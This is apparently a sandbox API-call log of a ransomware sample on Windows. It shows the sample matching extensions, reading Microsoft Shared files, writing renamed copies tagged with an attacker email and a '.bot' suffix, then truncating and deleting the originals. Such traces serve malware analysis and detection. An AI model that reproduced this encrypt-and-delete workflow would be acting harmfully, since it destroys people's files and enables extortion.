	[0040.015] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.016] lstrlenW (lpString=".dbf") returned 4
	[0040.016] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.016] lstrlenW (lpString=".1cd") returned 4
	[0040.016] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112
	[0040.016] lstrlenW (lpString=".jpg") returned 4
	[0040.016] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.016] lstrcmpiW (lpString1=".HTM", lpString2=".bot") returned 1
	[0040.016] lstrlenW (lpString="MCABOUT.HTM") returned 11
	[0040.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0040.017] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=11463) returned 1
	[0040.017] CloseHandle (hObject=0x1f4) returned 1
	[0040.017] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 0x20
	[0040.017] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0040.017] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.017] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0040.162] GetLastError () returned 0x0
	[0040.162] ReadFile (in: hFile=0x1f4, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x2cc7, lpOverlapped=0x0) returned 1
	[0040.170] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x2cd0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x2cd0, lpOverlapped=0x0) returned 1
	[0040.171] ReadFile (in: hFile=0x1f4, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.171] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0040.171] SetEndOfFile (hFile=0x1b0) returned 1
	[0040.171] CloseHandle (hObject=0x1b0) returned 1
	[0040.172] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.172] SetEndOfFile (hFile=0x1f4) returned 1
	[0040.173] CloseHandle (hObject=0x1f4) returned 1
	[0040.173] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.173] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 1
	[0040.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.173] lstrlenW (lpString=".doc") returned 4
	[0040.173] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1
	[0040.173] lstrlenW (lpString=".docx") returned 5
	[0040.173] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1
	[0040.173] lstrlenW (lpString=".pdf") returned 4
	[0040.173] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1
	[0040.173] lstrlenW (lpString=".xls") returned 4
	[0040.173] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1
	[0040.173] lstrlenW (lpString=".xlsx") returned 5
	[0040.173] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1
	[0040.173] lstrlenW (lpString=".ppt") returned 4
	[0040.173] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1
	[0040.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.174] lstrlenW (lpString=".zip") returned 4
	[0040.174] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1
	[0040.174] lstrlenW (lpString=".rar") returned 4
	[0040.174] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1
	[0040.174] lstrlenW (lpString=".bz2") returned 4
	[0040.174] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1
	[0040.174] lstrlenW (lpString=".7z") returned 3
	[0040.174] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1
	[0040.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.174] lstrlenW (lpString=".dbf") returned 4
	[0040.174] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1
	[0040.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.174] lstrlenW (lpString=".1cd") returned 4
	[0040.174] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1
	[0040.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.174] lstrlenW (lpString=".jpg") returned 4
	[0040.174] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1
	[0040.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.174] lstrlenW (lpString=".doc") returned 4
	[0040.174] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1
	[0040.174] lstrlenW (lpString=".docx") returned 5
	[0040.174] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1
	[0040.174] lstrlenW (lpString=".pdf") returned 4
	[0040.174] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1
	[0040.174] lstrlenW (lpString=".xls") returned 4
	[0040.174] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1
	[0040.174] lstrlenW (lpString=".xlsx") returned 5
	[0040.174] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1
	[0040.174] lstrlenW (lpString=".ppt") returned 4
	[0040.174] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1
	[0040.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.174] lstrlenW (lpString=".zip") returned 4
	[0040.174] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1
	[0040.174] lstrlenW (lpString=".rar") returned 4
	[0040.175] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1
	[0040.175] lstrlenW (lpString=".bz2") returned 4
	[0040.175] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1
	[0040.175] lstrlenW (lpString=".7z") returned 3
	[0040.175] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1
	[0040.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.175] lstrlenW (lpString=".dbf") returned 4
	[0040.175] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1
	[0040.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.175] lstrlenW (lpString=".1cd") returned 4
	[0040.175] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1
	[0040.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73
	[0040.175] lstrlenW (lpString=".jpg") returned 4
	[0040.175] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1
	[0040.175] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0040.175] lstrlenW (lpString="STOCKS.XML") returned 10
	[0040.175] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.563] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=2687) returned 1
	[0040.563] CloseHandle (hObject=0x1a0) returned 1
	[0040.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 0x20
	[0040.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.563] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.563] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0040.563] GetLastError () returned 0x0
	[0040.564] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xa7f, lpOverlapped=0x0) returned 1
	[0040.565] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xa80, lpOverlapped=0x0) returned 1
	[0040.566] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.566] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0040.566] SetEndOfFile (hFile=0x1fc) returned 1
	[0040.566] CloseHandle (hObject=0x1fc) returned 1
	[0040.567] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.567] SetEndOfFile (hFile=0x1a0) returned 1
	[0040.568] CloseHandle (hObject=0x1a0) returned 1
	[0040.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.568] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 1
	[0040.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.569] lstrlenW (lpString=".doc") returned 4
	[0040.569] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.569] lstrlenW (lpString=".docx") returned 5
	[0040.569] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1
	[0040.569] lstrlenW (lpString=".pdf") returned 4
	[0040.569] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.569] lstrlenW (lpString=".xls") returned 4
	[0040.569] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.569] lstrlenW (lpString=".xlsx") returned 5
	[0040.569] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1
	[0040.569] lstrlenW (lpString=".ppt") returned 4
	[0040.569] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.569] lstrlenW (lpString=".zip") returned 4
	[0040.569] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.569] lstrlenW (lpString=".rar") returned 4
	[0040.569] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.569] lstrlenW (lpString=".bz2") returned 4
	[0040.569] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.569] lstrlenW (lpString=".7z") returned 3
	[0040.569] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.569] lstrlenW (lpString=".dbf") returned 4
	[0040.570] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.570] lstrlenW (lpString=".1cd") returned 4
	[0040.570] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.570] lstrlenW (lpString=".jpg") returned 4
	[0040.570] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.570] lstrlenW (lpString=".doc") returned 4
	[0040.570] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.570] lstrlenW (lpString=".docx") returned 5
	[0040.570] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1
	[0040.570] lstrlenW (lpString=".pdf") returned 4
	[0040.570] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.570] lstrlenW (lpString=".xls") returned 4
	[0040.570] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.570] lstrlenW (lpString=".xlsx") returned 5
	[0040.570] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1
	[0040.570] lstrlenW (lpString=".ppt") returned 4
	[0040.570] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.570] lstrlenW (lpString=".zip") returned 4
	[0040.570] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.570] lstrlenW (lpString=".rar") returned 4
	[0040.570] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.570] lstrlenW (lpString=".bz2") returned 4
	[0040.570] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.570] lstrlenW (lpString=".7z") returned 3
	[0040.570] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.570] lstrlenW (lpString=".dbf") returned 4
	[0040.570] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.570] lstrlenW (lpString=".1cd") returned 4
	[0040.571] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78
	[0040.571] lstrlenW (lpString=".jpg") returned 4
	[0040.571] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.571] lstrcmpiW (lpString1=".emf", lpString2=".bot") returned 1
	[0040.571] lstrlenW (lpString="Genko_2.emf") returned 11
	[0040.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.262] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=10340) returned 1
	[0042.262] CloseHandle (hObject=0x1f0) returned 1
	[0042.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf")) returned 0x20
	[0042.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0042.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.262] lstrlenW (lpString=".doc") returned 4
	[0042.262] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0042.262] lstrlenW (lpString=".docx") returned 5
	[0042.262] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1
	[0042.262] lstrlenW (lpString=".pdf") returned 4
	[0042.262] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0042.262] lstrlenW (lpString=".xls") returned 4
	[0042.262] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0042.262] lstrlenW (lpString=".xlsx") returned 5
	[0042.263] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1
	[0042.263] lstrlenW (lpString=".ppt") returned 4
	[0042.263] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0042.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.263] lstrlenW (lpString=".zip") returned 4
	[0042.263] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0042.263] lstrlenW (lpString=".rar") returned 4
	[0042.263] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0042.263] lstrlenW (lpString=".bz2") returned 4
	[0042.263] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0042.263] lstrlenW (lpString=".7z") returned 3
	[0042.263] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0042.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.263] lstrlenW (lpString=".dbf") returned 4
	[0042.263] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0042.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.263] lstrlenW (lpString=".1cd") returned 4
	[0042.263] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0042.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.263] lstrlenW (lpString=".jpg") returned 4
	[0042.263] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0042.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.263] lstrlenW (lpString=".doc") returned 4
	[0042.263] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0042.263] lstrlenW (lpString=".docx") returned 5
	[0042.263] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1
	[0042.263] lstrlenW (lpString=".pdf") returned 4
	[0042.263] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0042.263] lstrlenW (lpString=".xls") returned 4
	[0042.263] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0042.263] lstrlenW (lpString=".xlsx") returned 5
	[0042.263] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1
	[0042.264] lstrlenW (lpString=".ppt") returned 4
	[0042.264] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0042.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.264] lstrlenW (lpString=".zip") returned 4
	[0042.264] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0042.264] lstrlenW (lpString=".rar") returned 4
	[0042.264] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0042.264] lstrlenW (lpString=".bz2") returned 4
	[0042.264] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0042.264] lstrlenW (lpString=".7z") returned 3
	[0042.264] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0042.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.264] lstrlenW (lpString=".dbf") returned 4
	[0042.264] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0042.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.264] lstrlenW (lpString=".1cd") returned 4
	[0042.264] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0042.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69
	[0042.264] lstrlenW (lpString=".jpg") returned 4
	[0042.264] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0042.264] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0042.264] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0042.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0042.762] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=34916) returned 1
	[0042.762] CloseHandle (hObject=0x1b0) returned 1
	[0042.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 0x20
	[0042.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
